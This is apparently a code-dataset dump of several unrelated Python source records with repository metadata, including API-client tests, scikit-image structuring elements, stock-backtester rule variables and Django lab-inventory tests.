remove_disfluencies=True,
delete_after_seconds=0,
language=LANGUAGE,
transcriber=TRANSCRIBER)
mock_session.request.assert_called_once_with(
"POST",
JOBS_URL,
files={
'media': (FILENAME, file),
'options': (
None,
json.dumps({
'metadata': METADATA,
'notification_config': {'url': NOTIFICATION_URL,
'auth_headers': NOTIFICATION_AUTH},
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'custom_vocabularies': CUSTOM_VOCAB,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'custom_vocabulary_id': CUSTOM_VOCAB_ID,
'transcriber': TRANSCRIBER
}, sort_keys=True)
)
},
headers=client.default_headers)
@pytest.mark.parametrize('filename', [None, ''])
def test_submit_job_url_with_no_filename(self, filename, mock_session):
with pytest.raises(ValueError, match='filename must be provided'):
RevAiAPIClient(TOKEN).submit_job_local_file(filename, None)
def test_delete_job_success(self, mock_session, make_mock_response):
response = make_mock_response(url=JOB_ID_URL, status=204)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.delete_job(JOB_ID)
assert res is None
mock_session.request.assert_called_once_with("DELETE",
JOB_ID_URL,
headers=client.default_headers)
@pytest.mark.parametrize('id', [None, ''])
def test_delete_job_with_no_id(self, id, mock_session):
with pytest.raises(ValueError, match='id_ must be provided'):
RevAiAPIClient(TOKEN).delete_job(id)
| 42.594787
| 100
| 0.516551
| 1,594
| 17,975
| 5.486826
| 0.103513
| 0.038989
| 0.034759
| 0.038418
| 0.875143
| 0.856735
| 0.829179
| 0.791562
| 0.755774
| 0.741367
| 0
| 0.013671
| 0.40178
| 17,975
| 421
| 101
| 42.695962
| 0.799684
| 0.002837
| 0
| 0.710183
| 0
| 0
| 0.131488
| 0.02277
| 0
| 0
| 0
| 0
| 0.052219
| 1
| 0.031332
| false
| 0
| 0.020888
| 0
| 0.05483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cba0e2916aed52419b5806f0ad75802ee3d2113
| 1,169
|
py
|
Python
|
openff/bespokefit/tests/schema/test_results.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 12
|
2020-08-28T20:49:00.000Z
|
2021-11-17T08:50:32.000Z
|
openff/bespokefit/tests/schema/test_results.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 95
|
2020-02-19T18:40:54.000Z
|
2021-12-02T10:52:23.000Z
|
openff/bespokefit/tests/schema/test_results.py
|
openforcefield/openff-bespokefit
|
85c92a51055a5a82e5d50fee1668a7de4ce2b1d4
|
[
"MIT"
] | 3
|
2021-04-01T04:22:49.000Z
|
2021-04-13T03:19:10.000Z
|
from simtk import unit
def test_initial_parameter_values(bespoke_optimization_results):
parameter_values = bespoke_optimization_results.initial_parameter_values
assert len(parameter_values) == len(
bespoke_optimization_results.input_schema.stages[0].parameters
)
assert all(
isinstance(parameter, unit.Quantity)
for x in parameter_values.values()
for parameter in x.values()
)
assert all(
parameter != 2 * unit.kilojoules_per_mole
for x in parameter_values.values()
for parameter in x.values()
)
def test_refit_parameter_values(bespoke_optimization_results):
refit_parameter_values = bespoke_optimization_results.refit_parameter_values
assert len(refit_parameter_values) == len(
bespoke_optimization_results.input_schema.stages[0].parameters
)
assert all(
isinstance(parameter, unit.Quantity)
for x in refit_parameter_values.values()
for parameter in x.values()
)
assert all(
parameter == 2 * unit.kilocalories_per_mole
for x in refit_parameter_values.values()
for parameter in x.values()
)
| 27.833333
| 80
| 0.707442
| 138
| 1,169
| 5.702899
| 0.224638
| 0.228717
| 0.198221
| 0.172808
| 0.864041
| 0.742058
| 0.742058
| 0.742058
| 0.742058
| 0.599746
| 0
| 0.00441
| 0.224123
| 1,169
| 41
| 81
| 28.512195
| 0.863286
| 0
| 0
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.193548
| 1
| 0.064516
| false
| 0
| 0.032258
| 0
| 0.096774
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2cccae22279d7a1fd21be292e75bca1a0dd2d8ef
| 5,433
|
py
|
Python
|
skimage/morphology/selem.py
|
genp/scikit-image
|
0295d5423585efc39bea7b25b5b00a6f6ee4533a
|
[
"BSD-3-Clause"
] | null | null | null |
skimage/morphology/selem.py
|
genp/scikit-image
|
0295d5423585efc39bea7b25b5b00a6f6ee4533a
|
[
"BSD-3-Clause"
] | null | null | null |
skimage/morphology/selem.py
|
genp/scikit-image
|
0295d5423585efc39bea7b25b5b00a6f6ee4533a
|
[
"BSD-3-Clause"
] | 1
|
2020-02-25T10:44:47.000Z
|
2020-02-25T10:44:47.000Z
|
"""
:author: Damian Eads, 2009
:license: modified BSD
"""
import numpy as np
def square(width, dtype=np.uint8):
"""
Generates a flat, square-shaped structuring element. Every pixel
along the perimeter has a chessboard distance no greater than radius
(radius=floor(width/2)) pixels.
Parameters
----------
width : int
The width and height of the square
Other Parameters
----------------
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
A structuring element consisting only of ones, i.e. every
pixel belongs to the neighborhood.
"""
return np.ones((width, width), dtype=dtype)
def rectangle(width, height, dtype=np.uint8):
"""
Generates a flat, rectangular-shaped structuring element of a
given width and height. Every pixel in the rectangle belongs
to the neighboorhood.
Parameters
----------
width : int
The width of the rectangle
height : int
The height of the rectangle
Other Parameters
----------------
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
A structuring element consisting only of ones, i.e. every
pixel belongs to the neighborhood.
"""
return np.ones((width, height), dtype=dtype)
def diamond(radius, dtype=np.uint8):
"""
Generates a flat, diamond-shaped structuring element of a given
radius. A pixel is part of the neighborhood (i.e. labeled 1) if
the city block/manhattan distance between it and the center of the
neighborhood is no greater than radius.
Parameters
----------
radius : int
The radius of the diamond-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
half = radius
(I, J) = np.meshgrid(range(0, radius * 2 + 1), range(0, radius * 2 + 1))
s = np.abs(I - half) + np.abs(J - half)
return np.array(s <= radius, dtype=dtype)
def disk(radius, dtype=np.uint8):
"""
Generates a flat, disk-shaped structuring element of a given radius.
A pixel is within the neighborhood if the euclidean distance between
it and the origin is no greater than radius.
Parameters
----------
radius : int
The radius of the disk-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
L = np.linspace(-radius, radius, 2 * radius + 1)
(X, Y) = np.meshgrid(L, L)
s = X**2
s += Y**2
return np.array(s <= radius * radius, dtype=dtype)
def cube(width, dtype=np.uint8):
"""
Generates a cube-shaped structuring element (the 3D equivalent of
a square). Every pixel along the perimeter has a chessboard distance
no greater than radius (radius=floor(width/2)) pixels.
Parameters
----------
width : int
The width, height and depth of the cube
Other Parameters
----------------
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
A structuring element consisting only of ones, i.e. every
pixel belongs to the neighborhood.
"""
return np.ones((width, width, width), dtype=dtype)
def octahedron(radius, dtype=np.uint8):
"""
Generates a octahedron-shaped structuring element of a given radius
(the 3D equivalent of a diamond). A pixel is part of the
neighborhood (i.e. labeled 1) if the city block/manhattan distance
between it and the center of the neighborhood is no greater than
radius.
Parameters
----------
radius : int
The radius of the octahedron-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
# note that in contrast to diamond(), this method allows non-integer radii
n = 2 * radius + 1
Z, Y, X = np.mgrid[ -radius:radius:n*1j,
-radius:radius:n*1j,
-radius:radius:n*1j]
s = np.abs(X) + np.abs(Y) + np.abs(Z)
return np.array(s <= radius, dtype=dtype)
def ball(radius, dtype=np.uint8):
"""
Generates a ball-shaped structuring element of a given radius (the
3D equivalent of a disk). A pixel is within the neighborhood if the
euclidean distance between it and the origin is no greater than
radius.
Parameters
----------
radius : int
The radius of the ball-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
n = 2 * radius + 1
Z, Y, X = np.mgrid[ -radius:radius:n*1j,
-radius:radius:n*1j,
-radius:radius:n*1j]
s = X**2 + Y**2 + Z**2
return np.array(s <= radius * radius, dtype=dtype)
| 26.632353
| 78
| 0.618995
| 727
| 5,433
| 4.62586
| 0.155433
| 0.133809
| 0.078501
| 0.043711
| 0.823075
| 0.792447
| 0.741302
| 0.722272
| 0.702646
| 0.680642
| 0
| 0.0125
| 0.278483
| 5,433
| 203
| 79
| 26.763547
| 0.845408
| 0.658568
| 0
| 0.375
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.21875
| false
| 0
| 0.03125
| 0
| 0.46875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
393050e7840ae4f4e8e3fbee59d51698e358eace
| 221
|
py
|
Python
|
commander/thirdparty/covertutils/handlers/impl/__init__.py
|
how2how/ToyHome
|
4457b1d28e21ed6fd4ab980a0f7fed345c570ae3
|
[
"Apache-2.0"
] | 1
|
2020-07-26T01:08:30.000Z
|
2020-07-26T01:08:30.000Z
|
commander/thirdparty/covertutils/handlers/impl/__init__.py
|
how2how/ToyHome
|
4457b1d28e21ed6fd4ab980a0f7fed345c570ae3
|
[
"Apache-2.0"
] | null | null | null |
commander/thirdparty/covertutils/handlers/impl/__init__.py
|
how2how/ToyHome
|
4457b1d28e21ed6fd4ab980a0f7fed345c570ae3
|
[
"Apache-2.0"
] | null | null | null |
from covertutils.handlers.impl.simpleshell import SimpleShellHandler
from covertutils.handlers.impl.standardshell import StandardShellHandler
from covertutils.handlers.impl.extendableshell import ExtendableShellHandler
| 36.833333
| 76
| 0.895928
| 21
| 221
| 9.428571
| 0.52381
| 0.227273
| 0.348485
| 0.409091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063348
| 221
| 5
| 77
| 44.2
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1aa8aad8731a399aadf713c93f4a6a84bb7757aa
| 191
|
py
|
Python
|
core/controllers/__init__.py
|
bopopescu/sdba
|
f1ecb71ebe627643fd296a07a3ca66b366cd37b9
|
[
"MIT"
] | 2
|
2020-08-11T13:55:40.000Z
|
2021-01-05T15:23:32.000Z
|
core/controllers/__init__.py
|
bopopescu/sdba
|
f1ecb71ebe627643fd296a07a3ca66b366cd37b9
|
[
"MIT"
] | null | null | null |
core/controllers/__init__.py
|
bopopescu/sdba
|
f1ecb71ebe627643fd296a07a3ca66b366cd37b9
|
[
"MIT"
] | 1
|
2020-07-24T07:26:46.000Z
|
2020-07-24T07:26:46.000Z
|
from core.controllers.admin import AdminController
from core.controllers.api import ApiController
from core.controllers.api_mock import ApiMockController
if __name__ == "__main__":
pass
| 27.285714
| 55
| 0.827225
| 23
| 191
| 6.478261
| 0.608696
| 0.161074
| 0.38255
| 0.295302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115183
| 191
| 6
| 56
| 31.833333
| 0.881657
| 0
| 0
| 0
| 0
| 0
| 0.041885
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
1aaaa292c2594302a83e70f7f6d38fe977df4f5d
| 11,953
|
py
|
Python
|
stockVars.py
|
md100play/Stock_Backtester
|
03e8bf048f8a5602d8172dff0c1d12f2ed9af7ff
|
[
"MIT"
] | 1
|
2017-05-28T22:30:07.000Z
|
2017-05-28T22:30:07.000Z
|
stockVars.py
|
MikeDombo/Stock_Backtester
|
03e8bf048f8a5602d8172dff0c1d12f2ed9af7ff
|
[
"MIT"
] | 1
|
2017-05-04T03:28:04.000Z
|
2017-05-04T05:45:53.000Z
|
stockVars.py
|
md100play/Stock_Backtester
|
03e8bf048f8a5602d8172dff0c1d12f2ed9af7ff
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017 by Michael Dombrowski <http://MikeDombrowski.com/>.
#
# This file is part of Python Customizable Stock Backtester <http://github.com/md100play/Stock_Backtester/>.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, distribute with
# modifications, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Except as contained in this notice, the name(s) of the above copyright
# holders shall not be used in advertising or otherwise to promote the sale,
# use or other dealings in this Software without prior written authorization.
from booleano.operations import Variable, ArrayVariable
class StockPrice(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['price'])
else:
return float(context['stock']["data"].get(self.index)['price'])
class StockOpenPrice(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['open_price'])
else:
return float(context['stock']["data"].get(self.index)['open_price'])
class StockClosePrice(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['close_price'])
else:
return float(context['stock']["data"].get(self.index)['close_price'])
class StockBuyPrice(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
return float(context['stock']['buy_price'])
class StockOwned(Variable):
operations = {"boolean"}
def equals(self, value, context):
actual = self.to_python(context)
expected = bool(value)
return actual == expected
def __call__(self, context):
return self.to_python(context)
def to_python(self, context):
return bool(context['stock']['owned'])
class StockIncreaseRank(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return int(context['stock']['increase_rank'])
else:
return int(context['stock']["data"].get(self.index)['increase_rank'])
class StockDecreaseRank(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return int(context['stock']['decrease_rank'])
else:
return int(context['stock']["data"].get(self.index)['decrease_rank'])
class StockPercChange(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['change_percent'])
else:
return float(context['stock']["data"].get(self.index)['change_percent'])
class StockSymbol(Variable):
operations = {"equality", "membership"}
def equals(self, value, context):
actual_symbol = self.to_python(context).lower()
expected_symbol = value.lower()
return actual_symbol == expected_symbol
def belongs_to(self, value, context):
return self.to_python(context) in value
def is_subset(self, value, context):
return value.issubset(self.to_python(context))
def to_python(self, context):
return str(context['stock']["symbol"])
class DateBuy(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual < expected
def __other_to_python(self, value):
return value
def to_python(self, context):
return context["date"]["buy"]
class DateToday(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual < expected
def __other_to_python(self, value):
return value
def to_python(self, context):
if self.index == 0:
return context["date"]["today"]
else:
return context["date"]["data"].get(self.index)['today']
class DateDayOfWeek(ArrayVariable):
operations = {"equality", "inequality", "membership"}
def equals(self, value, context):
actual_symbol = self.to_python(context)
expected_symbol = value.lower()
return actual_symbol == expected_symbol
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def belongs_to(self, value, context):
return self.to_python(context) in value
def is_subset(self, value, context):
return value.issubset(self.to_python(context))
def to_python(self, context):
if self.index == 0:
return int(context['date']["day_of_week"])
else:
return int(context["date"]["data"].get(self.index)['day_of_week'])
class DateMonth(ArrayVariable):
operations = {"equality", "inequality", "membership"}
def equals(self, value, context):
actual_symbol = self.to_python(context)
expected_symbol = value.lower()
return actual_symbol == expected_symbol
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def belongs_to(self, value, context):
return self.to_python(context) in value
def is_subset(self, value, context):
return value.issubset(self.to_python(context))
def to_python(self, context):
if self.index == 0:
return int(context['date']["month"])
else:
return int(context["date"]["data"].get(self.index)['month'])
class DateDays(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
return int(context["date"]["days"])
class DateMonths(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
return int(context["date"]["months"])
class DateYears(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
return int(context["date"]["years"])
class DateDaysOfHistory(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return int(context['date']['days_of_history'])
else:
return int(context["date"]["data"].get(self.index)['days_of_history'])
| 27.22779
| 108
| 0.725425
| 1,577
| 11,953
| 5.387445
| 0.121116
| 0.074388
| 0.076271
| 0.120763
| 0.787194
| 0.778249
| 0.772834
| 0.772834
| 0.772834
| 0.753649
| 0
| 0.00168
| 0.153267
| 11,953
| 438
| 109
| 27.289954
| 0.837763
| 0.120974
| 0
| 0.832787
| 0
| 0
| 0.068696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.239344
| false
| 0
| 0.003279
| 0.052459
| 0.62623
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ab4341cb4e492d2f28055d808ca03dc4fdb0118
| 18
|
py
|
Python
|
Python/Tests/TestData/Grammar/UnaryOperators.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/UnaryOperators.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/UnaryOperators.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
-1
~1
+1
not 1
| 4.5
| 5
| 0.388889
| 6
| 18
| 1.333333
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.363636
| 0.388889
| 18
| 4
| 5
| 4.5
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
46cee5ab35c5589e8878eed739d687b50e890efb
| 11,043
|
py
|
Python
|
src/resource_inventory/tests/test_managers.py
|
opnfv/laas
|
35b9f39178cc502a5283a1b37a65f7dd0838ae05
|
[
"Apache-2.0"
] | 2
|
2020-10-31T15:03:20.000Z
|
2021-03-22T16:29:15.000Z
|
src/resource_inventory/tests/test_managers.py
|
opnfv/laas
|
35b9f39178cc502a5283a1b37a65f7dd0838ae05
|
[
"Apache-2.0"
] | 13
|
2019-12-04T23:29:42.000Z
|
2022-03-02T04:53:53.000Z
|
src/resource_inventory/tests/test_managers.py
|
opnfv/laas
|
35b9f39178cc502a5283a1b37a65f7dd0838ae05
|
[
"Apache-2.0"
] | null | null | null |
##############################################################################
# Copyright (c) 2018 Parker Berberian, Sawyer Bergeron, and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
from django.test import TestCase
from django.contrib.auth.models import User
from resource.inventory_manager import InventoryManager
from resource.resource_manager import ResourceManager, HostNameValidator
from account.models import Lab
from resource.models import (
Host,
Vlan,
Interface,
ResourceBundle,
GenericHost,
GenericResourceBundle,
CpuProfile,
RamProfile,
DiskProfile,
HostProfile,
InterfaceProfile
)
class InventoryManagerTestCase(TestCase):
    """Tests for the InventoryManager singleton and host acquire/release."""

    def test_singleton(self):
        """getInstance() must always hand back the same InventoryManager."""
        instance = InventoryManager.getInstance()
        self.assertTrue(isinstance(instance, InventoryManager))
        self.assertTrue(instance is InventoryManager.getInstance())

    def setUp(self):
        # Create a lab owned by a fresh user.
        user = User.objects.create(username="username")
        self.lab = Lab.objects.create(
            lab_user=user,
            name='test lab',
            contact_email='someone@email.com',
            contact_phone='dont call me'
        )
        # Host profile plus its interface/disk/cpu/ram sub-profiles.
        hostProfile = HostProfile.objects.create(
            host_type=0,
            name='Test profile',
            description='a test profile'
        )
        InterfaceProfile.objects.create(
            speed=1000,
            name='eno3',
            host=hostProfile
        )
        DiskProfile.objects.create(
            size=1000,
            media_type="SSD",
            name='/dev/sda',
            host=hostProfile
        )
        CpuProfile.objects.create(
            cores=96,
            architecture="x86_64",
            cpus=2,
            host=hostProfile
        )
        RamProfile.objects.create(
            amount=256,
            channels=4,
            host=hostProfile
        )
        # Generic (template) bundle with two generic hosts.
        genericBundle = GenericResourceBundle.objects.create()
        self.gHost1 = GenericHost.objects.create(
            bundle=genericBundle,
            name='generic host 1',
            profile=hostProfile
        )
        self.gHost2 = GenericHost.objects.create(
            bundle=genericBundle,
            name='generic host 2',
            profile=hostProfile
        )
        # Concrete bundle with two booked hosts instantiating the templates.
        bundle = ResourceBundle.objects.create(template=genericBundle)
        self.host1 = Host.objects.create(
            template=self.gHost1,
            booked=True,
            name='host1',
            bundle=bundle,
            profile=hostProfile,
            lab=self.lab
        )
        self.host2 = Host.objects.create(
            template=self.gHost2,
            booked=True,
            name='host2',
            bundle=bundle,
            profile=hostProfile,
            lab=self.lab
        )
        # NOTE(review): both vlans share vlan_id=300 — looks copy/pasted;
        # confirm whether host2 was meant to use a distinct vlan id.
        vlan1 = Vlan.objects.create(vlan_id=300, tagged=False)
        vlan2 = Vlan.objects.create(vlan_id=300, tagged=False)
        Interface.objects.create(
            mac_address='00:11:22:33:44:55',
            bus_address='some bus address',
            switch_name='switch1',
            port_name='port10',
            config=vlan1,
            host=self.host1
        )
        Interface.objects.create(
            mac_address='00:11:22:33:44:56',
            bus_address='some bus address',
            switch_name='switch1',
            port_name='port12',
            config=vlan2,
            host=self.host2
        )

    def test_acquire_host(self):
        """Acquiring against a generic host yields a booked matching Host."""
        host = InventoryManager.getInstance().acquireHost(self.gHost1, self.lab.name)
        # assertIsNotNone replaces the deprecated assertNotEquals alias.
        self.assertIsNotNone(host)
        self.assertTrue(host.booked)
        self.assertEqual(host.template, self.gHost1)

    def test_release_host(self):
        """Releasing an acquired host clears its booked flag."""
        host = InventoryManager.getInstance().acquireHost(self.gHost1, self.lab.name)
        self.assertTrue(host.booked)
        InventoryManager.getInstance().releaseHost(host)
        self.assertFalse(host.booked)
class ResourceManagerTestCase(TestCase):
    """Tests for the ResourceManager singleton and bundle conversion."""

    def test_singleton(self):
        """getInstance() must always hand back the same ResourceManager."""
        instance = ResourceManager.getInstance()
        self.assertTrue(isinstance(instance, ResourceManager))
        self.assertTrue(instance is ResourceManager.getInstance())

    def setUp(self):
        # Create a lab owned by a fresh user.
        user = User.objects.create(username="username")
        self.lab = Lab.objects.create(
            lab_user=user,
            name='test lab',
            contact_email='someone@email.com',
            contact_phone='dont call me'
        )
        # Host profile plus its interface/disk/cpu/ram sub-profiles.
        hostProfile = HostProfile.objects.create(
            host_type=0,
            name='Test profile',
            description='a test profile'
        )
        InterfaceProfile.objects.create(
            speed=1000,
            name='eno3',
            host=hostProfile
        )
        DiskProfile.objects.create(
            size=1000,
            media_type="SSD",
            name='/dev/sda',
            host=hostProfile
        )
        CpuProfile.objects.create(
            cores=96,
            architecture="x86_64",
            cpus=2,
            host=hostProfile
        )
        RamProfile.objects.create(
            amount=256,
            channels=4,
            host=hostProfile
        )
        # Generic (template) bundle with two generic hosts.
        # FIX: store the bundle on self — test_convert_bundle reads
        # self.genericBundle, which previously raised AttributeError
        # because the bundle only existed as a local variable here.
        self.genericBundle = GenericResourceBundle.objects.create()
        self.gHost1 = GenericHost.objects.create(
            bundle=self.genericBundle,
            name='generic host 1',
            profile=hostProfile
        )
        self.gHost2 = GenericHost.objects.create(
            bundle=self.genericBundle,
            name='generic host 2',
            profile=hostProfile
        )
